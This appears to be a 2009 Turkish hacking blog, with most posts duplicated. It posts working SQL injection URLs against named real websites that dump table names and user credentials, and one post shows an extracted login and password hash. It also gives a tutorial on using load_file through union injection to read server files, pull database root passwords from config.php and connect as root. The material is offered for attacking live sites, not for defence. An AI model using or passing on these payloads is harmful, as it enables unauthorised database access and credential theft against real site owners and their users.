site:
http://shop.gigabyte.tw/
sql:
http://shop.gigabyte.tw/showroom/mallset_u.php?SOB=
-10878'%20union%20select%20group_concat(table_name)
,2+from%20information_schema.tables/*
uğraşmadım bakan hackler cc yok galiba :S
by TheNeSa
24 Eylül 2009 Perşembe
17 Eylül 2009 Perşembe
MySQL SQL Injection Cheat Sheet
S.a arkadaşlar
pentestmonkey.net’de MySQL SQL Injection Cheat Sheet gördüm ve inceledim
gerçekten incelemeye değer her türlü komut mevcut mysql injectiona hakim olabilmek için
güzel bişe. Ben baktım inceledim sizde inceleyin. Umarım işinize yarar.
Bu arada 2 tanede bağlantı var biri md5 kırmak için diğeri .c exploit bağlantısı.
Not: eğer “bunu anlamıyoruz bunu Türkçeleştirin, açıklamalarını yapıda bize sunun”
diyosanız bir yorum bırakın eğer istek olursa onuda yaparıs.
Kolay gelsin.
İşte MySQL SQL Injection Cheat Sheet
Download
Kaynak: pentestmonkey.net
by TheNeSa
pentestmonkey.net’de MySQL SQL Injection Cheat Sheet gördüm ve inceledim
gerçekten incelemeye değer her türlü komut mevcut mysql injectiona hakim olabilmek için
güzel bişe. Ben baktım inceledim sizde inceleyin. Umarım işinize yarar.
Bu arada 2 tanede bağlantı var biri md5 kırmak için diğeri .c exploit bağlantısı.
Not: eğer “bunu anlamıyoruz bunu Türkçeleştirin, açıklamalarını yapıda bize sunun”
diyosanız bir yorum bırakın eğer istek olursa onuda yaparıs.
Kolay gelsin.
İşte MySQL SQL Injection Cheat Sheet
Download
Kaynak: pentestmonkey.net
by TheNeSa
Youtube Sorununa bi Çözümde Benden
Bildiğiniz gibi youtube ülkemizden kapalı bunu için çözümümüz dns ve proxy oluyor.
dns çoğu zman sorun oluşturabiliyo bende bu sebepten proxyi tercih ediyorum.
proxde bazen çalışıyo bazen çalışmıyo o sebeple geniş bi proxy listesini size sunuyorum.
bunun için size verceğim dosyayı belirtilen klasördekiyle değiştirmeniz yetiyor.
gayet hızlı gayet sağlam bi çözüm. sorun çıkarmayacağına garanti veriyorum :D
işte Download
nese kolay gelsin ha bide iyi seyirler :D
not: içinde oku diye metin belgesi var onu oku tmmdır :D
by TheNeSa
11 Eylül 2009 Cuma
mysql Root
s.a arkadaşlar mysql root anlatacağım
mysql root için load_file okumamız l
azım onun içinde mysql.user'in olması lazım.
mysql.user'in olsuğunu varsayalım.
column sayılarını eşitlenmiş farzediyosrus
:D buraları anlatmıştık :D
sitemiz thenesa.com/nesa.php?id=-9999 union select 1,2,3--
şimdi load_file içinde sitenin uzantısını bilmek gerekiyo
hatadan /home/thenesa/httpdocs/nesa.php uzantısı aldık.
şimdi bunu okuyalım.
thenesa.com/nesa.php?id=-9999 union select 1,load_file('/home/thenesa/httpdocs/nesa.php'),3--
magic var farzedelim
thenesa.com/nesa.php?id=-9999 union select 1,load_file(0xhexlenmiş hali:D),3--
yine olmadı şimdi
thenesa.com/nesa.php?id=-9999 union select 1,unhex(hex(load_file(0xhexlenmiş hali:D))),3--
yine olmassa charlayın
thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--
oda olmadı
thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--
unhex yaptıkya benzerini charla yapın yani
full char v.s v.s olur yani tabi mysql.user varsa.
şimid okuduk. baktık sitede config.php var :D
onu okuyak şimdi . /home/thenesa/httpdocs/config.php
onuda okuduk yukardaki gibi :D
baktık karşımıza
şöle bişe çıktı
// database server
$forum_server = “localhost”; //
// database user name
$forum_un = “root”;
// database password
$forum_pw = “root”;
// database name
$forum_database = “sqldb”;
?>
burdan db user name root pass root olduğunu öğreniyoruz.
öğrenelim :D
user root pass root :D
onlarıda aldık şimdi sitenin ip sini alıp
(ip almayı biliyosnuz dimi :D ping le :D)
MySQL Front v.b programlarla siteye bağlanıp root olcas
ama burdada bi güvenlik sorunu var
bağlana bilmem için sistemin 3306 portunun
açık olması lazım. eğer portumuzda açıksa
MySQL Front v.b programlarla bağlnıp
istediğimiz herşeyi yapabilirs.
kolay gelsin.
not: biras özet anlattım ayrıntılarda
load_file okumalarında sorun yaşarsanız onuda
ayrıntısıyla anlatırım istek olursa tabi.
işte mysql front Download
by TheNeSa
mysql root için load_file okumamız l
azım onun içinde mysql.user'in olması lazım.
mysql.user'in olsuğunu varsayalım.
column sayılarını eşitlenmiş farzediyosrus
:D buraları anlatmıştık :D
sitemiz thenesa.com/nesa.php?id=-9999 union select 1,2,3--
şimdi load_file içinde sitenin uzantısını bilmek gerekiyo
hatadan /home/thenesa/httpdocs/nesa.php uzantısı aldık.
şimdi bunu okuyalım.
thenesa.com/nesa.php?id=-9999 union select 1,load_file('/home/thenesa/httpdocs/nesa.php'),3--
magic var farzedelim
thenesa.com/nesa.php?id=-9999 union select 1,load_file(0xhexlenmiş hali:D),3--
yine olmadı şimdi
thenesa.com/nesa.php?id=-9999 union select 1,unhex(hex(load_file(0xhexlenmiş hali:D))),3--
yine olmassa charlayın
thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--
oda olmadı
thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--
unhex yaptıkya benzerini charla yapın yani
full char v.s v.s olur yani tabi mysql.user varsa.
şimid okuduk. baktık sitede config.php var :D
onu okuyak şimdi . /home/thenesa/httpdocs/config.php
onuda okuduk yukardaki gibi :D
baktık karşımıza
şöle bişe çıktı
// database server
$forum_server = “localhost”; //
// database user name
$forum_un = “root”;
// database password
$forum_pw = “root”;
// database name
$forum_database = “sqldb”;
?>
burdan db user name root pass root olduğunu öğreniyoruz.
öğrenelim :D
user root pass root :D
onlarıda aldık şimdi sitenin ip sini alıp
(ip almayı biliyosnuz dimi :D ping le :D)
MySQL Front v.b programlarla siteye bağlanıp root olcas
ama burdada bi güvenlik sorunu var
bağlana bilmem için sistemin 3306 portunun
açık olması lazım. eğer portumuzda açıksa
MySQL Front v.b programlarla bağlnıp
istediğimiz herşeyi yapabilirs.
kolay gelsin.
not: biras özet anlattım ayrıntılarda
load_file okumalarında sorun yaşarsanız onuda
ayrıntısıyla anlatırım istek olursa tabi.
işte mysql front Download
by TheNeSa
6 Eylül 2009 Pazar
www.kurdistaname.com SQL pkk sitesi galiba
site:
www.kurdistaname.com
SQL:
http://www.kurdistaname.com/qunciknivis.php?id=14%20and%201=2
%20union%20select%201,2,3,4,
unhex(hex(group_concat(kullanici,0x3a,sifre))),6,7,8%20from%20yazarlar
panel bulamadım :S
kolay gelsin
by TheNeSa
www.kurdistaname.com
SQL:
http://www.kurdistaname.com/qunciknivis.php?id=14%20and%201=2
%20union%20select%201,2,3,4,
unhex(hex(group_concat(kullanici,0x3a,sifre))),6,7,8%20from%20yazarlar
panel bulamadım :S
kolay gelsin
by TheNeSa
3 Eylül 2009 Perşembe
Www.nic.gp :D
site:
http://www.nic.gp/
SQL:
http://www.nic.gp/news/newsReader.php?id=-1+
union+select+0,unhex(hex(concat_ws(0x3a,id,login,pass))),2,3%20from%20wusers
user pass
1:pr:1d7f2cc41d686ece
BgH7 kardeşimle yaptğımız küçük çalışma :D
kolay gelsin
by TheNeSa
http://www.nic.gp/
SQL:
http://www.nic.gp/news/newsReader.php?id=-1+
union+select+0,unhex(hex(concat_ws(0x3a,id,login,pass))),2,3%20from%20wusers
user pass
1:pr:1d7f2cc41d686ece
BgH7 kardeşimle yaptğımız küçük çalışma :D
kolay gelsin
by TheNeSa
Kaydol:
Kayıtlar (Atom)